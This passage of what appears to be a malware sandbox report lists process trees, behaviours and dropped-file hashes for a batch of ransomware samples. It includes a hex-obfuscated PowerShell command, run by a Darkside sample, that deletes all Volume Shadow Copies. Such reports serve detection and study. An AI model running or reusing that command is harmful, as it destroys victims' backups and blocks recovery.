                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer start page
                • Suspicious use of SetWindowsHookEx
                PID:1264
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
                Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
                3⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                PID:4996
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
                Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4736
                • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
                  Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3404
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
                Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4728
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:5296
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe
                Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                PID:5520
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe
                Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe
                3⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:5044
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\server.bat" "
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:5896
                  • C:\Users\Admin\AppData\Local\Temp\CyberPunk2077.sfx.exe
                    CyberPunk2077.sfx.exe -p1234 -dC:\Users\Admin\AppData\Local\Temp
                    5⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:5472
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1324
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"
                        7⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in System32 directory
                        • Drops file in Program Files directory
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        PID:5800
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe
                Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:5908
                • C:\Windows\SysWOW64\svchost.exe
                  "C:\Windows\SysWOW64\svchost.exe"
                  4⤵
                  • Adds Run key to start application
                  • Drops file in System32 directory
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:4292
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 720
                    5⤵
                    • Program crash
                    PID:5744
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 728
                    5⤵
                    • Program crash
                    PID:5608
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
                Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:5892
                • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
                  Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
                  4⤵
                  • Executes dropped EXE
                  PID:6128
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe
                Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe
                3⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:6072
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe
                Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:6876
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 472
                  4⤵
                  • Program crash
                  PID:6920
              • C:\Users\Admin\Desktop\00403\UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe
                UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:6448
                • C:\Users\Admin\AppData\Local\Temp\497D8E.exe
                  C:\Users\Admin\AppData\Local\Temp\497D8E.exe
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  PID:6948
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1704
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3448 -ip 3448
            1⤵
            PID:1192
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4292 -ip 4292
            1⤵
            PID:276
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6876 -ip 6876
            1⤵
            PID:256
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4292 -ip 4292
            1⤵
            PID:6652
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1824 -ip 1824
            1⤵
            PID:6096
          • C:\Windows\system32\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\readme.txt
            1⤵
            • Opens file in notepad (likely ransom note)
            PID:1008
          • C:\Windows\system32\OpenWith.exe
            C:\Windows\system32\OpenWith.exe -Embedding
            1⤵
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:6524
          • C:\Windows\system32\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.d96d1f6d.TXT
            1⤵
            • Opens file in notepad (likely ransom note)
            PID:5664
          • C:\Windows\system32\wbengine.exe
            "C:\Windows\system32\wbengine.exe"
            1⤵
            PID:3592
          • C:\Windows\System32\vdsldr.exe
            C:\Windows\System32\vdsldr.exe -Embedding
            1⤵
            PID:1160
          • C:\Windows\System32\vds.exe
            C:\Windows\System32\vds.exe
            1⤵
            • Checks SCSI registry key(s)
            PID:7264
          • C:\Windows\system32\OpenWith.exe
            C:\Windows\system32\OpenWith.exe -Embedding
            1⤵
            • Modifies registry class
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:7356
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\Readme.README
              2⤵
              • Opens file in notepad (likely ransom note)
              PID:5084
          • C:\Windows\system32\AUDIODG.EXE
            C:\Windows\system32\AUDIODG.EXE 0x41c 0x3f8
            1⤵
            PID:6148
          • C:\Windows\System32\rundll32.exe
            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            1⤵
            PID:6552

                            Network

                            MITRE ATT&CK Enterprise v15

                            Downloads

                            • C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\MicrosoftEdgeUpdate.exe.DEMON

                              Filesize

                              209KB

                              MD5

                              d233eef438a2a99e1438fba6e6461043

                              SHA1

                              d9cc485124a1fbb8c5cad3a096b2113d3780baf3

                              SHA256

                              ada7349b9242d8c1ec6cc7f4d7c8b17d6a2d9d6c1bb160bd3998ededa3900251

                              SHA512

                              dd496880361c9c68e770c09285f7b60e938a32f10d4bb03536169690623b2b657ae43fc9219982d50d5bb856ca66636380b98375101502b41c825ab18d533bba

                            • C:\Program Files (x86)\readme.txt

                              Filesize

                              1KB

                              MD5

                              65b045a29c11fd41c72a74a784081bdc

                              SHA1

                              20d7079bc7c6262f3b4a56220e30285101c1fc5d

                              SHA256

                              2ecc0df9b581b25f9072d51160a6c4b983dc88de1da5e752cc5266ee26cacf42

                              SHA512

                              d6f7ce54e86636adb1e2fd6904732709762a043318bc9d3c32341d629c408a630741916008a01596636d2ab3d2115859483ec92e957693e28fc281f76f0e5bfe

                            • C:\Program Files\Crashpad\attachments\Restore-My-Files.txt

                              Filesize

                              1KB

                              MD5

                              58ffaabd4f02822cf0d7a36b6f7cf663

                              SHA1

                              38c18f4c095442890df757f95f7a37ec4b49b055

                              SHA256

                              9f7d47d0a58eb2d21610091ecd6a7df85d67f9d1600d889407b19a7610b74f62

                              SHA512

                              71f0ee6c292f07247110f1014c489ecf24d14ea353442b26f4a14752a606350fe6c6939bb0b902a88b8728d077efe07f52a08d23a518ff95d8099f954f6e5d5f

                            • C:\Recovery\README.d96d1f6d.TXT

                              Filesize

                              2KB

                              MD5

                              25d0b19a0ec34a39dfa3e177866f01a3

                              SHA1

                              a3704d1f6499738ccd694bdd6008a850c6b2e453

                              SHA256

                              f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8

                              SHA512

                              ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

                            • C:\Updates\ZTH.bat

                              Filesize

                              153B

                              MD5

                              9542b61a1b1a67deb6f5608395efd465

                              SHA1

                              74158ed4ee52a7001a9831f80cd3ef60c081679a

                              SHA256

                              2fb0e6d5f7bab7d4446b8701d608cdec83cbada4f7d7e8c6ab43f5915a42742c

                              SHA512

                              e2c1cbb8b8176257296593a5b72ddc22d6009f0e4c7c8c2ecce2faa234f0882e7b4d001c834a6d5846cced03fdc57da16294a5e6f73b8541cce9c805d204e41d

                            • C:\Updates\h.vbs

                              Filesize

                              78B

                              MD5

                              c578d9653b22800c3eb6b6a51219bbb8

                              SHA1

                              a97aa251901bbe179a48dbc7a0c1872e163b1f2d

                              SHA256

                              20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2

                              SHA512

                              3ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                              Filesize

                              64KB

                              MD5

                              d2fb266b97caff2086bf0fa74eddb6b2

                              SHA1

                              2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                              SHA256

                              b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                              SHA512

                              c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                              Filesize

                              4B

                              MD5

                              f49655f856acb8884cc0ace29216f511

                              SHA1

                              cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                              SHA256

                              7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                              SHA512

                              599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                              Filesize

                              944B

                              MD5

                              6bd369f7c74a28194c991ed1404da30f

                              SHA1

                              0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                              SHA256

                              878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                              SHA512

                              8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                            • C:\Users\Admin\AppData\Local\Temp\497D8E.exe

                              Filesize

                              212KB

                              MD5

                              2f2e7ef471eb0c5785552b4e4476eddc

                              SHA1

                              bbeea16734e19f3fd081391612af51112f107d13

                              SHA256

                              63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be

                              SHA512

                              d5414eb8b3ee49a00c9db617e20e16bb3058e449a1538df5e0ad61c5a935a95e9f25d52f93b79b5e783b5c404f9164de859ac76690ec00f50696fcb2a54b1221

                            • C:\Users\Admin\AppData\Local\Temp\CyberPunk2077.sfx.exe

                              Filesize

                              9.9MB

                              MD5

                              f65b6e5c80643e85771e1b050cce51f3

                              SHA1

                              e9d6ec45859868fda152fd19a0c977a439be40fa

                              SHA256

                              7e946b53dd48fc7d42a8812ab0450e1193ae21ee9990d812811224c3429ecfc5

                              SHA512

                              63d3fb8b157c30fc155feedf01ba7f141e7251d9a424e056b8f6798ee1238dc6c5834938940c3fd445ed9c22a53841f389f3d553c6b53e52285030751e120c53

                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe

                              Filesize

                              9.9MB

                              MD5

                              9bb3e77f3a2b7329ca41979a783996ae

                              SHA1

                              fb4d3e1fe06bab2bb9255f18b1e8e079fbf6de06

                              SHA256

                              08124c7d2c97ffd108f1b7c9bba86aaeff5a41d16c77fcf11b3a8c9504f93424

                              SHA512

                              d1c4567034e479956c43660c4553d8aff2242dae7c414900747cdb0d59ace891bdf5774474e8509a8c33291dbf13561bfadd4758d77d2f60ae8e9cb262a08bf1

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\VCRUNTIME140.dll

                              Filesize

                              81KB

                              MD5

                              aeab74db6bc6c914997f1a8a9ff013ec

                              SHA1

                              6b717f23227d158d6aa566498c438b8f305a29b5

                              SHA256

                              18ccb2dd8af853f4e6221bb5513e3154ef67ae61cee6ec319a8a97615987dc4b

                              SHA512

                              a2832b7720599361e2537f79a2597acb1a2d5633fdfe20a0d1075e9457683fdb1d5676d121c0bf1a825ff99512dcd924254f1151b50aae922acc0cc10f461036

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_bz2.pyd

                              Filesize

                              71KB

                              MD5

                              2bb3496c855e5f9f14005e36525f9ed7

                              SHA1

                              a09598372eb8b825e762fc7c18b75c8ad6a70568

                              SHA256

                              b4995be5f03dce5bf0443bfae4cf8cb2ec5b16ae3bb078333123927323aa0dca

                              SHA512

                              d06d83683524c082886fe3fa5269ea1c9ec0c61d6835a9dde2b91d6bcbb02fa2bf0c2936c1f3c99a3ba741d7c688c1c3727b8a2a6fef03d8d5c00c3b448f2a68

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_cffi_backend.cp36-win32.pyd

                              Filesize

                              143KB

                              MD5

                              ea3d64b8cebcbcc84e230733824d83ee

                              SHA1

                              e59e4e9353b8d282e022ac0f5ecfaabdb6b91d24

                              SHA256

                              1baaaede2f7324b31f67f3d3ec98982c75a5438a1e83a5ddb6dd14d9fcf8e768

                              SHA512

                              03d08fd9b66eced2668b6fc83b1c7778b6689a504ccb93ec912935303595035138bf30aec95cada8b502833234c60f52fb65487843717e6d231fcc04217dbe82

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_ctypes.pyd

                              Filesize

                              104KB

                              MD5

                              17bce334e63161d93954596cab85ce93

                              SHA1

                              d9be6bf1b9b6415b12810ae3cdaac381746aac7a

                              SHA256

                              72187b58b87abab33c760fed3e1d295b8c6786e80490125cee138b424bc71e37

                              SHA512

                              98a915bbe67b6d5ce48f3d15135724a52d456ff1a0713da7b8febc24be7ea466e3405fec032212b1353e9675f2d044a7f13e514a5e4a1d82fa4905d7a2e7f262

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_hashlib.pyd

                              Filesize

                              1.1MB

                              MD5

                              c9f92d933589fe85deffb89ce3d08052

                              SHA1

                              f9349a85d4097cdd3c011c8b267921af3c9c6552

                              SHA256

                              a49b409b3ba4c6bce74fc5bf31ba53ba080b1a33cb83c92e5354b9164d030ea6

                              SHA512

                              87668439aa812f0a8672805039bf6667a1fa221435a1f5bf6c82fd66deeeb7d3ec2d33a04a45311cb50d59131f98c54d3624ed2cd5f269da69c62706808283e3

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_lzma.pyd

                              Filesize

                              180KB

                              MD5

                              d8ed156b7acacba7ae93f64cd3a6c488

                              SHA1

                              368ca96eb8d569b8f3cb70e4bbf6a427902fea32

                              SHA256

                              c68164809b0c27c93ebd87cbbb5f422463554cbc15b2b24ed86967947b11bf16

                              SHA512

                              107e66d42455e395fcdd032f0e5a2c555cd7cc435d5b3bc8fc213f02f3aab30f79b361e0df0b46b41d337249ef84a1b8ec3e3cfbce522ce00b1907d909447f97

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_socket.pyd

                              Filesize

                              61KB

                              MD5

                              070df20954306ae7c97b8a04390fdf47

                              SHA1

                              064bc619ba2985f913d6ccb871286fcfad5e61cd

                              SHA256

                              93cc376d376b374585d417a499d2ab8026a8b5bafa58632c2e1e09cdc4063461

                              SHA512

                              13273dc5067511a46f8b6ac4124a10e6f816420f6fbf231ef09c2557b76443a7e0489182c6ddc29bb6fdb482719cbcb9b4f592f3b135bb1d955caf16a9402484

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_ssl.pyd

                              Filesize

                              1.5MB

                              MD5

                              72802b72dd0d697f1fedb7d8a1e6cef3

                              SHA1

                              6df67366b8efa36e738b26a58ecd4168b09bcd16

                              SHA256

                              1d15049774b483f8b063aea48e95a66d2dfd4dbdf376b1fa971fc8646605857d

                              SHA512

                              9f2d4fa88a46895e4ff9e50e815ed0ab652c900b3a7f50e76ccf7d43b484c58dbc635d8be0fe2138c9e9965a672dfad8aa1481f1191a4c6cdce2cda0f1b74ce8

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\base_library.zip

                              Filesize

                              761KB

                              MD5

                              5ca73655bc3c1ddfa091c03ab6626b1d

                              SHA1

                              23aa306f7a06321f75e58bcd5f45361b6be9d6c8

                              SHA256

                              f3764218a7843bbda56c7df7cc2ee9462898f67e8bc97e498d4851e2f58ab977

                              SHA512

                              dc10b38b7117992e4db0116cdfed33b492ae5f6665d038524e2ce95609efb5b69a1230c62e43b2dfad26cfaf982e4772ed5470794c1764d25ade1219e8c65744

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\cryptography\hazmat\bindings\_openssl.pyd

                              Filesize

                              2.2MB

                              MD5

                              48aea2ba1df0ead97735a2907308ebe4

                              SHA1

                              18a06b41e94241ac686c8cd583c7b58cd743416f

                              SHA256

                              3d21f3fd38219ba59a9793662d843219fc708e0cff619b3a4063cf8b4b4662de

                              SHA512

                              b65d520f5652f639db555f99aa324c7a172172861e05f3e85563a56f10b4ab1094155e6e3580ff08254a885b8a434c7c53452402db47bd2731d9a17cd324c76b

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\cryptography\hazmat\bindings\_padding.pyd

                              Filesize

                              10KB

                              MD5

                              ce6bdab775a6469b676462fca5195cb8

                              SHA1

                              e373b3189d9d4231f961a0865d774217d9c4a1bc

                              SHA256

                              554e30c9fb50dcb48cb68064662c30e2fe8b48f9e4aad77e7c4f335ce3825f19

                              SHA512

                              d0262f2831e36583e609eefdb410a416df61aa8c8ee884326b418455d737a8ccc7745f8aa8c181e981e554f845daaff462cba3a94593ef31b83edb0c4509b254

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\python3.dll

                              Filesize

                              57KB

                              MD5

                              bac7dd23125b09f2909c25eb23e1f811

                              SHA1

                              2ef9a1f3d10399864c2ef63030ada29b8059c6f6

                              SHA256

                              8fad4082b691a9ef4191519175d1000fa44341e59a1a9db01f3df4ca3ede42c3

                              SHA512

                              95b6930a2add69c9f2b266680392b4948e7d04059074466f1fcd556a0cf09f464163cb5720409b80745e303c469c72edbd8b6036721f29b5601ed20d82b77688

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\python36.dll

                              Filesize

                              3.3MB

                              MD5

                              c5b23d73fd8e234125e271cf00090a14

                              SHA1

                              686963d9b782bf7ad60651668a1d93eeb09b79d1

                              SHA256

                              8b0ffa63d874192350552d99392785e14faf36e2e4c91db0830eeb3d8197c2f2

                              SHA512

                              f4847f02c742ad7e76098530ddfd21666695ce6be48e77ddee799e8f6b7a04079896f450ba78ab4926e629c1d32d38242a203ebfdbc90c096773d5153f86e9f6

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\pywintypes36.dll

                              Filesize

                              110KB

                              MD5

                              6b3210f989d523d133cda1ff8f9ff286

                              SHA1

                              ab642dfe42597d1fdebcf0a93589502faa3ae600

                              SHA256

                              37b7eb8e8895eca62c3eedb3ba4ef381f5f51aed894e1651a78186c39c5db191

                              SHA512

                              80272375aace4b00acec3c7279683725351f0b0a54bee54e6d265bcd13cbdf52c6561236b386dbde81e882f1723dfaad7f3d8c6546abcf7a54d95b4e8ffbc69b

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\select.pyd

                              Filesize

                              22KB

                              MD5

                              3e3b975dd01db8c4e1804e07656ed0f2

                              SHA1

                              f4f33520f9a9f084337a98672853587351726dfb

                              SHA256

                              97e0aa3d061f47faad6e8818cc4377d972edbeecd20791fd1de9786988224b11

                              SHA512

                              780fc536001d365681ca68229aac09a5eb8a7c0263641ad906222ed3306f359d0c1e5cc26d9a9373b9e7b925108292ce4c426f8442da0006333bb34dc9ebd343

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\win32gui.pyd

                              Filesize

                              170KB

                              MD5

                              30865748c2848ec07115835a553b968c

                              SHA1

                              95c8fd6b2f685219670d2c85440fbbab9d6085ae

                              SHA256

                              220c04a51892082d70f2b7635f10a81b1a2d59fd22fbb0973b67bde193bb81b0

                              SHA512

                              beb6cdbf46bb117ad59cba42da89d011cd24962eeb93bb1f8359e255ee70657c26798358c97fa38fc434a8fbd3f691635a17a13e3ddce2b57b5b280be447834d

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xxd0olzv.cet.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Local\Temp\nsoCC5F.tmp\INetC.dll

                              Filesize

                              24KB

                              MD5

                              640bff73a5f8e37b202d911e4749b2e9

                              SHA1

                              9588dd7561ab7de3bca392b084bec91f3521c879

                              SHA256

                              c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502

                              SHA512

                              39c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe

                              Filesize

                              19.7MB

                              MD5

                              389be2d6eaa3936e971c41bb2cf418d9

                              SHA1

                              1035eb142fd54b1616edd266de6df02aedbbc8cc

                              SHA256

                              86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8

                              SHA512

                              573662105f6e04906024aa79418f578ce6715126a9347344917c094e7588c15a32e51fd2f319897d72a30272f04d0d5c3222061debedd2203d6c7cc012d90688

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe

                              Filesize

                              1.3MB

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe

                              Filesize

                              3.9MB

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe

                              Filesize

                              190KB

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe

                              Filesize

                              97KB

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe

                              Filesize

                              322KB

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe

                              Filesize

                              504KB

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe

                              Filesize

                              356KB

                            • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe

                              Filesize

                              1.5MB

                            • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe

                              Filesize

                              7.9MB

                            • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe

                              Filesize

                              6.5MB

                            • C:\Windows\WinSxS\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.19041.746_none_9d44fd61d4c8aeec\SecurityHealthSystray.exe

                              Filesize

                              84KB

                            • C:\Windows\WinSxS\amd64_windows-shield-provider_31bf3856ad364e35_10.0.19041.84_none_9d98e005fb7852ca\FeatureToastBulldogImg.png

                              Filesize

                              43KB

